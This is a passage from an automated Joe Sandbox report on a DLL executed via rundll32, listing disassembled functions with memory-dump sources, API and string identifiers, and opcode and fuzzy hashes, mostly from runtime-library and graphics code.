                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !HasParseError()$-$.$0$9$9$c:\dvs\p4\build\sw\tools\rapidjson\1.0.2\include\rapidjson\reader.h
                                                                                                                                  • API String ID: 0-3209311536
                                                                                                                                  • Opcode ID: db156d5e6b1fd06958f9be440001634de32f651bcb9ade1e133a39411df2c1c4
                                                                                                                                  • Instruction ID: 94cebc99c47b9652360329d8206ebedd8a277811fd0beb55dbd802028c6cc7ca
                                                                                                                                  • Opcode Fuzzy Hash: db156d5e6b1fd06958f9be440001634de32f651bcb9ade1e133a39411df2c1c4
                                                                                                                                  • Instruction Fuzzy Hash: 5D322926F14A0285FB268F68C4A01BE37A5FF04B9AF549235DE4C57794EF7AE482C340
                                                                                                                                  Function 00007FFD92DBC4B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: GetEnabledXStateFeatures$GetLocaleInfoEx
                                                                                                                                  • API String ID: 2742660187-3297707652
                                                                                                                                  • Opcode ID: a130f83b860ec145877ee2c0ac99f2bd9b8d4243ce3a9c210e22fa574152f31c
                                                                                                                                  • Instruction ID: 72b2e33e0bdd090b88e8cf6f88ade48b26686b3a9e5e70b7e708ee4f6302100e
                                                                                                                                  • Opcode Fuzzy Hash: a130f83b860ec145877ee2c0ac99f2bd9b8d4243ce3a9c210e22fa574152f31c
                                                                                                                                  • Instruction Fuzzy Hash: 3E118F61F08B42C1FA30EFD2B8601A56365EF947C1F540932EA4C13BA9CE7CE5059340
                                                                                                                                  Function 00007FFD92DB2A60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62timethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2933794660-1018135373
                                                                                                                                  • Opcode ID: 9c37060bb5aff8f47d83b418f54173fdaeadf3418620d2c1b083643b80c47b69
                                                                                                                                  • Instruction ID: a53e6b805c7e045b5c2c390c03c9541809882df7c343302b740477d296c08a62
                                                                                                                                  • Opcode Fuzzy Hash: 9c37060bb5aff8f47d83b418f54173fdaeadf3418620d2c1b083643b80c47b69
                                                                                                                                  • Instruction Fuzzy Hash: B8118232B04B028AEB34DFB5D8990B933A4FB49759B410A71DA1E83B84DE7CD661C380
                                                                                                                                  Function 000000018001B924 Relevance: 6.5, APIs: 4, Instructions: 543COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 491317670-0
                                                                                                                                  • Opcode ID: 32a054681ada761a3f21b934110cbacde2a58451cc4452ceb2e2b32a685144d7
                                                                                                                                  • Instruction ID: ae333f1357bb5ac04765cce638402cad7685101a5c7d4aa2e7d208c612dcf27a
                                                                                                                                  • Opcode Fuzzy Hash: 32a054681ada761a3f21b934110cbacde2a58451cc4452ceb2e2b32a685144d7
                                                                                                                                  • Instruction Fuzzy Hash: 1F32B032604E9885EBA68F25D8453ED63A4F75CBC8F548111FB8957B99EF38CA89C340
                                                                                                                                  Function 000000018001B138 Relevance: 6.5, APIs: 4, Instructions: 543COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 491317670-0
                                                                                                                                  • Opcode ID: d8653a78ccc0500016ee3a39bc8ed8050953f96735a7a63760c9342397005fa0
                                                                                                                                  • Instruction ID: 4647e442d3bcfc851c9f4701ce4f14d67acf718bc96bb144a9f397481643842c
                                                                                                                                  • Opcode Fuzzy Hash: d8653a78ccc0500016ee3a39bc8ed8050953f96735a7a63760c9342397005fa0
                                                                                                                                  • Instruction Fuzzy Hash: 9C32B132604E9886EBA29F25D8453ED63A5F758BC8F54C111FF8957B99EF38C689C300
                                                                                                                                  Function 0000000180026890 Relevance: 6.5, APIs: 4, Instructions: 524COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 491317670-0
                                                                                                                                  • Opcode ID: 72a7ac2e2c1f111e1b61ae734374779d00f08ed685c08311d7ac3453d226d6ed
                                                                                                                                  • Instruction ID: 2589bcd918802237b5c990292f2751727b1abcad383ca43231b0e5c6f6b0472f
                                                                                                                                  • Opcode Fuzzy Hash: 72a7ac2e2c1f111e1b61ae734374779d00f08ed685c08311d7ac3453d226d6ed
                                                                                                                                  • Instruction Fuzzy Hash: 93324E72A04BC885EB678F25C4503ED6761F399BC8F54C112EA8D57BAADF39C689C340
                                                                                                                                  Function 00007FFD92DB1AA0 Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - Null BlendInfo struct passed or not enough bitmaps passed$%s- CreateBitmap failed with %x error$CNVDirectBlend::doMultiBlend$EndDraw failed with %x error$blendEffect->SetValue failed with %x error
                                                                                                                                  • API String ID: 0-3199250351
                                                                                                                                  • Opcode ID: a2896140135b26fb250a8b78eea17674e9889428b40501cc1cab32bbba52f567
                                                                                                                                  • Instruction ID: fccdf5c8161865814da89acbdeb44b350219cd5816b7cec82869ac5ee68c222b
                                                                                                                                  • Opcode Fuzzy Hash: a2896140135b26fb250a8b78eea17674e9889428b40501cc1cab32bbba52f567
                                                                                                                                  • Instruction Fuzzy Hash: F9C17976B05A45CAEB20CFAAD4906EC3364FB88B89F019136DE5D17768CF3AE551D340
                                                                                                                                  Function 00000001800147EC Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 962COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunctlocaleconv
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                                                  • API String ID: 3643605086-3606100449
                                                                                                                                  • Opcode ID: 94432bfd2f8d95df277d2e9dbc6edac5d8f0baf28bc49a8a7a32c7f5d36230e7
                                                                                                                                  • Instruction ID: 5ab51ccc94a7dab44ec95765bb0b019680b649c223dae5af60e6b35ee96dccf9
                                                                                                                                  • Opcode Fuzzy Hash: 94432bfd2f8d95df277d2e9dbc6edac5d8f0baf28bc49a8a7a32c7f5d36230e7
                                                                                                                                  • Instruction Fuzzy Hash: C8925E37204A88C5EBA68B65C1503FD37A1FB49BC4F54C016EE9A1BBA5DF35CA5AC310
                                                                                                                                  Function 0000000180013BA0 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 962COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunctlocaleconv
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                                                  • API String ID: 3643605086-3606100449
                                                                                                                                  • Opcode ID: 2b3747df4bcc6815d0ca050ff0a1d26fc9399c5a2f48bb3d04cf2418fda5afce
                                                                                                                                  • Instruction ID: 15170c7321f925de93854cd2b60bf2d9794a6949502e19fd89cf563b34aba275
                                                                                                                                  • Opcode Fuzzy Hash: 2b3747df4bcc6815d0ca050ff0a1d26fc9399c5a2f48bb3d04cf2418fda5afce
                                                                                                                                  • Instruction Fuzzy Hash: 46927E37204A88C5EBA68B66D1503FD27A1FB49BC8F54C415EF5A1B7A1CF35CA9AC310
                                                                                                                                  Function 0000000180013078 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 870COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID: 0123456789-+Ee
                                                                                                                                  • API String ID: 4240859931-1347306980
                                                                                                                                  • Opcode ID: d972bc5eca4d0b82fe2e94bffa6b7d9434b9e5222b7b794ba326fb571b0aa537
                                                                                                                                  • Instruction ID: 7fa30803b5596d2040c40fa2d6deab6b9b1eebdfa1222772e05d0cd440f79c75
                                                                                                                                  • Opcode Fuzzy Hash: d972bc5eca4d0b82fe2e94bffa6b7d9434b9e5222b7b794ba326fb571b0aa537
                                                                                                                                  • Instruction Fuzzy Hash: E882A032208A8886FBA68B65C1523FD37A1FB49BC4F54C416EF4A17B95DF39CA59C310
                                                                                                                                  Function 0000000180012550 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 870COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct
                                                                                                                                  • String ID: 0123456789-+Ee
                                                                                                                                  • API String ID: 4240859931-1347306980
                                                                                                                                  • Opcode ID: 821b9d4d01ecd75d4b1e2aa44c8194800fa5c52a50f71f3b929308d42d9b6223
                                                                                                                                  • Instruction ID: 541b46e9ef04b4a6691a8844132f360519d1f98d966391b6e758a932985ee6d9
                                                                                                                                  • Opcode Fuzzy Hash: 821b9d4d01ecd75d4b1e2aa44c8194800fa5c52a50f71f3b929308d42d9b6223
                                                                                                                                  • Instruction Fuzzy Hash: CF829036204A888AFBA68B65C1503FD37A1FB49BC4F54D416EF4A17795EF34CA69C310
                                                                                                                                  Function 00007FFD92DB40B0 Relevance: 6.1, Strings: 3, Instructions: 2339COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $0123456789-$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                                                                  • API String ID: 0-2198913001
                                                                                                                                  • Opcode ID: 788500d03a8e8ed5740f58eafa9c7274e13b0638dca434ae7f54c870b6c7dbd6
                                                                                                                                  • Instruction ID: f32b7c8f048831c043252e1b7934f5bf6f5d62d5681d89b22e6ff182950679f7
                                                                                                                                  • Opcode Fuzzy Hash: 788500d03a8e8ed5740f58eafa9c7274e13b0638dca434ae7f54c870b6c7dbd6
                                                                                                                                  • Instruction Fuzzy Hash: 18C2CF22B49A4286FB20CFA6D0602BD37A1FB45F85B449231DE5E17BA5EFBCE445C340
                                                                                                                                  Function 00007FFD92FD91F8 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 640timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InformationTimeZone
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 565725191-1684325040
                                                                                                                                  • Opcode ID: 25aa477e76f4055b09bd446a7b1b2da17507f2d2d17c222a63302eea670db2c0
                                                                                                                                  • Instruction ID: 00f5b7d947ab3a8c5525c813846f607b1d2022bf292fbb6fb1c8683093d01556
                                                                                                                                  • Opcode Fuzzy Hash: 25aa477e76f4055b09bd446a7b1b2da17507f2d2d17c222a63302eea670db2c0
                                                                                                                                  • Instruction Fuzzy Hash: 25E11032B086828AF7709FF6A8612B93794FB84799F446335EA4E43AC5CF7CE4418750
                                                                                                                                  Function 00000001800158A0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 467COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
